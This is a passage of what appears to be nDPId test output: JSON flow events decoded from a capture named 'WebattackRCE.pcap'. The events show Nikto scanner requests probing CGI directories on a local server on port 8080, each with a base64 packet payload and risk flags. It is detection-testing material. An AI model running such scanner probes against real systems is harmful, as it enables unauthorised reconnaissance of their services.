Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-914\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1576420276703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276703,"pkt":"AAAAAAAAAAAAAAAACABFAADEOclAAEAGAml\/AAABfwAAAcHCH5AyFgHRa7MhPoAYAED+uAAAAQEICp1m+wadZvsGR0VUIC9jZ2ktOTE1LyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-915\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1576420276704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276704,"pkt":"AAAAAAAAAAAAAAAACABFAADAObpAAEAGAnx\/AAABfwAAAcHEH5ArBQGh2qRxvoAYAED+tAAAAQEICp1m+widZvsIR0VUIC9iaW4vIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1576420276705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276705,"pkt":"AAAAAAAAAAAAAAAACABFAADARJ1AAEAG95h\/AAABfwAAAcHGH5BoLnyEpCdA\/4AYAED+tAAAAQEICp1m+wmdZvsJR0VUIC9jZ2kvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1576420276707,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276707,"pkt":"AAAAAAAAAAAAAAAACABFAADCUelAAEAG6kp\/AAABfwAAAcHIH5DIZGoAvjYJ64AYAED+tgAAAQEICp1m+wudZvsLR0VUIC9tcGNnaS8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQoNCg=="} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mpcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1576420276708,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276708,"pkt":"AAAAAAAAAAAAAAAACABFAADE7opAAEAGTad\/AAABfwAAAcHKH5CIytaS2kjlzYAYAED+uAAAAQEICp1m+wydZvsMR0VUIC9jZ2ktYmluLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1576420276710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276710,"pkt":"AAAAAAAAAAAAAAAACABFAADEp+BAAEAGlFF\/AAABfwAAAcHMH5C4I5\/IUy7GWoAYAED+uAAAAQEICp1m+w6dZvsNR0VUIC9vd3MtYmluLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ows-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1576420276711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276711,"pkt":"AAAAAAAAAAAAAAAACABFAADEXJRAAEAG351\/AAABfwAAAcHOH5AWt2SMpHJk2oAYAED+uAAAAQEICp1m+w+dZvsPR0VUIC9jZ2ktc3lzLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-sys\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1576420276713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276713,"pkt":"AAAAAAAAAAAAAAAACABFAADG5r1AAEAGVXJ\/AAABfwAAAcHQH5DCed6iQK2\/KYAYAED+ugAAAQEICp1m+xCdZvsQR0VUIC9jZ2ktbG9jYWwvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1576420276714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276714,"pkt":"AAAAAAAAAAAAAAAACABFAADCR6dAAEAG9Ix\/AAABfwAAAcHSH5C\/OX\/AhojitYAYAED+tgAAAQEICp1m+xKdZvsSR0VUIC9odGJpbi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htbin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1576420276717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276717,"pkt":"AAAAAAAAAAAAAAAACABFAADD3hBAAEAGXiJ\/AAABfwAAAcHUH5AtGuYWzQuuvoAYAED+twAAAQEICp1m+xSdZvsUR0VUIC9jZ2liaW4vIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgibin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1576420276718,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276718,"pkt":"AAAAAAAAAAAAAAAACABFAADB4dFAAEAGWmN\/AAABfwAAAcHWH5B7V9nVmVXzCoAYAED+tQAAAQEICp1m+xadZvsWR0VUIC9jZ2lzLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCg0K"} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 